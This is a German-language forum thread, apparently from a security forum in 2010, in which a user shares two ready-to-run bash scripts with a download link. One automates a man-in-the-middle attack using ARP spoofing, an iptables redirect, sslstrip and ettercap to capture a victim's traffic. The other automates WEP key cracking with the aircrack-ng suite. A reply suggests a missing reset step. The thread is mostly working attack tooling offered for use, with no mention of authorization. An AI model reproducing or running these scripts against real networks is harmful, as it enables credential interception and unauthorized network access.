Results 1 to 2 of 2

Thread: Ssl Sniff Script

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    10

    Default Super Scripts nur für euch

    Ich habe hier ein Script für euch geschrieben, mit dem ihr ganz einfach Sniffen könnt.
    [IMG]hxxp://img704.imageshack.us/img704/7228/bildschirmfotoa.png[/IMG]
    Code:
    #!/bin/bash
    txtblu='\e[0;34m' # Blue
    echo -e "${txtblu} _ _                     _   _____       _  __  __  "
    echo -e "${txtblu}(_) |                   | | /  ___|     (_)/ _|/ _| "
    echo -e "${txtblu} _| |     ___   __ _  __| | \  --. _ __  _| |_| |_  "
    echo -e "${txtblu}| | |    / _ \ / _  |/ _  |   --. \  _ \| |  _|  _| "
    echo -e "${txtblu}| | |___| (_) | (_| | (_| | /\__/ / | | | | | | |   "
    echo -e "${txtblu}|_\_____/\___/ \__,_|\__,_| \____/|_| |_|_|_| |_|  "
    txtblu='\e[0;31m'
    sleep 2
    clear
    echo -e "${txtblu} _ _                     _   _____       _  __  __  "
    echo -e "${txtblu}(_) |                   | | /  ___|     (_)/ _|/ _| "
    echo -e "${txtblu} _| |     ___   __ _  __| | \  --. _ __  _| |_| |_  "
    echo -e "${txtblu}| | |    / _ \ / _  |/ _  |   --. \  _ \| |  _|  _| "
    echo -e "${txtblu}| | |___| (_) | (_| | (_| | /\__/ / | | | | | | |   "
    echo -e "${txtblu}|_\_____/\___/ \__,_|\__,_| \____/|_| |_|_|_| |_|  "
    echo -e "${txtblu} Läd"
    sleep 0.40
    echo "."
    sleep 0.40
    echo "."
    sleep 0.40
    echo "."
    sleep 0.40
    echo "."
    sleep 0.40
    echo "."
    sleep 0.25
    echo "."
    txtblu='\e[0;34m'
    clear
    echo -e "${txtblu} _ _                     _   _____       _  __  __  "
    echo -e "${txtblu}(_) |                   | | /  ___|     (_)/ _|/ _| "
    echo -e "${txtblu} _| |     ___   __ _  __| | \  --. _ __  _| |_| |_  "
    echo -e "${txtblu}| | |    / _ \ / _  |/ _  |   --. \  _ \| |  _|  _| "
    echo -e "${txtblu}| | |___| (_) | (_| | (_| | /\__/ / | | | | | | |   "
    echo -e "${txtblu}|_\_____/\___/ \__,_|\__,_| \____/|_| |_|_|_| |_|  "
    sleep 5
    echo "1. Ubuntu"
    echo "2. Backtrack"
    echo "Bitte wähle dein OS"
    read dis
    if [ $dis -eq 1 ] ; then
     echo "Ist Ipv4 Forward an?" 
      if sudo sysctl -p | grep 1 
      then 
       echo "Super, dann gehts weiter" 
      fi
    else
     echo "1" > /proc/sys/net/ipv4/ip_forward
     echo "Weiterleitung ist an!"
    fi
    sleep 2
    echo "Wenn 1 dann ist alles ok"
    cat /proc/sys/net/ipv4/ip_forward
    echo "Bitte Gateway eingeben"
    read Router
    xterm -T ''Nmap'' -bg black -fg dodgerblue -e "nmap -sP $Router/24 ; bash" &
    echo "Bitte Ziel-Ip eingeben"
    read Ziel
    echo "Interface?"
    read inter
    sleep 3
    echo "Fenster im Hintergrund offen lassen" & xterm -T "Arpspoof" -bg black -fg dodgerblue -geometry 90x15 -e "sudo arpspoof -i $inter -t $Ziel $Router ; bash" & sleep 5 & echo "Nun werden die iptables eingerichtet" & sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 & sleep 5 & echo "Nun sslstrip" & xterm -T "SSLStrip" -bg black -fg dodgerblue -geometry 90x15 -e "sudo sslstrip -a -k -f ; bash" & sleep 5 & echo "Und nun Viel Spaß mit Ettercap!!" & sudo ettercap -T -q -i $inter
    killall xterm
    echo "Copyright by iLoad 2010, iload.cz.cc ."
    Viel Spaß!
    Um es zum laufen zu kriegen:
    nano /etc/etter.conf
    und NUR die Raute im Linux bereich (iptables) beim Redir_command_on wegmachen!
    Also so Sollte es aussehen:
    Code:
    # if you use iptables:
       redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
       #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    EDIT:
    Da ich so nett bin hab ich noch eins fürs WEP Cracken geschrieben:
    Code:
    #!/bin/bash
    txtblu='\e[0;31m'
    echo -e "${txtblu}                                ___           ___          _____    "
    echo "    ___                        /  /\         /  /\        /  /::\   "
    echo "   /  /\                      /  /::\       /  /::\      /  /:/\:\  "
    echo "  /  /:/      ___     ___    /  /:/\:\     /  /:/\:\    /  /:/  \:\ "
    echo " /__/::\     /__/\   /  /\  /  /:/  \:\   /  /:/~/::\  /__/:/ \__\:|"
    echo " \__\/\:\__  \  \:\ /  /:/ /__/:/ \__\:\ /__/:/ /:/\:\ \  \:\ /  /:/"
    echo "    \  \:\/\  \  \:\  /:/  \  \:\ /  /:/ \  \:\/:/__\/  \  \:\  /:/" 
    echo "     \__\::/   \  \:\/:/    \  \:\  /:/   \  \::/        \  \:\/:/"  
    echo "     /__/:/     \  \::/      \  \:\/:/     \  \:\         \  \::/"   
    echo "     \__\/       \__\/        \  \::/       \  \:\         \__\/"    
    echo "                               \__\/         \__\/"                  
    echo "      ___           ___           ___   "
    echo "     /__/\         /  /\         /  /\  "
    echo "    _\_ \:\       /  /:/_       /  /::\ "
    echo "   /__/\ \:\     /  /:/ /\     /  /:/\:\ "
    echo "  _\_ \:\ \:\   /  /:/ /:/_   /  /:/~/:/"
    echo " /__/\ \:\ \:\ /__/:/ /:/ /\ /__/:/ /:/" 
    echo " \  \:\ \:\/:/ \  \:\/:/ /:/ \  \:\/:/"  
    echo "  \  \:\ \::/   \  \::/ /:/   \  \::/ "  
    echo "   \  \:\/:/     \  \:\/:/     \  \:\ "  
    echo "    \  \::/       \  \::/       \  \:\ " 
    echo "     \__\/         \__\/         \__\/"  
    sleep 5
    txtblu='\e[0;34m' # Blue
    echo -e "${txtblu} Herzlich Willkommen!"
    echo "Bitte gebe dein Interface an (wlan0)"
    sudo iwconfig
    echo "Jetzt eingeben"
    read int
    sudo airmon-ng start $int
    echo "Nun Airodump, mit dem gerade erstelltem mon0 interface. zum Beenden bitte Ctrl+C drücken"
    sleep 5
    sudo airodump-ng mon0
    echo "OK, bitte wähle einen Namen für die Datei"
    read datei
    echo "Auf welchem Channel arbeitet der AP?"
    read ch
    echo "Und nun die MAC des APs"
    read mac
    echo "Nun der Name (Bitte in richtiger groß/klein-Schreibung"
    read name
    echo "Und nun noch mal deine Hardware Adresse von unten aptippen"
    ifconfig $int | grep Hardware
    read hm
    echo "BITTE ERST MIT CA. 30.000 PAKETEN MIT Ctrl + C ABBRECHEN!"
    sleep 5
    sudo airodump-ng -w $datei -c $ch --bssid $mac mon0 & xterm -T ''Registrieren'' -bg black -fg dodgerblue -e "sudo aireplay-ng -1 0 -e $name -a $mac -h $hm mon0 ; bash"
    echo "Dann werden die Pakete reinjectet" & xterm -T ''Reinjecten'' -bg black -fg dodgerblue -e "sudo aireplay-ng -3 -b $mac -h $hm mon0 ; bash"
    killall xterm
    echo "Super, nun das cracken!"
    ls
    echo "Bitte den Namen der Datei eingeben (mit .cap)!"
    read DT
    sudo aircrack-ng $DT
    echo "Das wars!, nun wird die Karte wieder in den Ursprungsmodus gebracht und dann kannst du dich mit deinem Lieblingsprogramm mit dem AP verbinden."
    clear
    echo "Copyright by iLoad 2010 , iload.cz.cc ."
    exit
    Ich wäre sehr dankbar für Feedback, damit ich diese Reihe noch fortsetzen kann!
    Für die ganz faulen; Hier zum Runterladen hxxp://multiupload.com/8SG51S25W9
    Könnte ein Mod bitte den BBcode für das bild so ändern das es sichtbar ist UND der Downloadlink UND den Titel ändern?

    iLoad

  2. #2
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    2

    Default Re: Ssl Sniff Script

    Gute Arbeit!

    Jedoch fehlt beim WEP Script noch was:

    Code:
    echo "Das wars!, nun wird die Karte wieder in den Ursprungsmodus gebracht und dann kannst du dich mit deinem Lieblingsprogramm mit dem AP verbinden."
    clear
    echo "Copyright by iLoad 2010 , iload.cz.cc ."
    exit
    der Befehl zum zurücksetzen!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •